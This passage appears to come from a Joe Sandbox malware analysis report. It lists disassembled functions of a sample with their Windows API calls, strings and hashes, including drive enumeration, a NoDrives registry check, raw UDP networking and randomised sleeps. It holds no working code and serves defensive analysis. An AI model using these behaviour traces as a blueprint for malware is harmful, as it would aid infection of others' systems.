                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                    Function 0040AB80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                    • String ID: .Mw
                                                                    • API String ID: 442028454-2453323595
                                                                    • Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                    • Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                    Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1447977647-3252725368
                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                    Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    Strings
                                                                    • NoDrives, xrefs: 00406418
                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                    • API String ID: 2666887985-3471754645
                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                    Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2251373460-0
                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                    Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CountTickrandsrand
                                                                    • String ID:
                                                                    • API String ID: 3488799664-0
                                                                    • Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                    • Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                    Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl_aullshr
                                                                    • String ID:
                                                                    • API String ID: 673498613-0
                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                    • htons.WS2_32(?), ref: 00401281
                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                    • String ID: pdu
                                                                    • API String ID: 2164660128-2320407122
                                                                    • Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                    • Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                    Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                    • String ID: .Mw
                                                                    • API String ID: 3102160386-2453323595
                                                                    • Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                    • Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                    Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                    • String ID: pdu$.Mw
                                                                    • API String ID: 309973729-3908477397
                                                                    • Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                    • Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3966618661-0
                                                                    • Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                    • Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                    Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: _allshl
                                                                    • String ID:
                                                                    • API String ID: 435966717-0
                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                    Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: DeviceDriveQueryType
                                                                    • String ID: \??\
                                                                    • API String ID: 1681518211-3047946824
                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                    Function 00407310 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 2064604595-2453323595
                                                                    • Opcode ID: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                    • Opcode Fuzzy Hash: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                    Function 0040E770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize
                                                                    • String ID: .Mw
                                                                    • API String ID: 1378416451-2453323595
                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                    • String ID:
                                                                    • API String ID: 3980219359-0
                                                                    • Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                    • Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                    • String ID:
                                                                    • API String ID: 2074799992-0
                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Recv$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 3668019968-0
                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
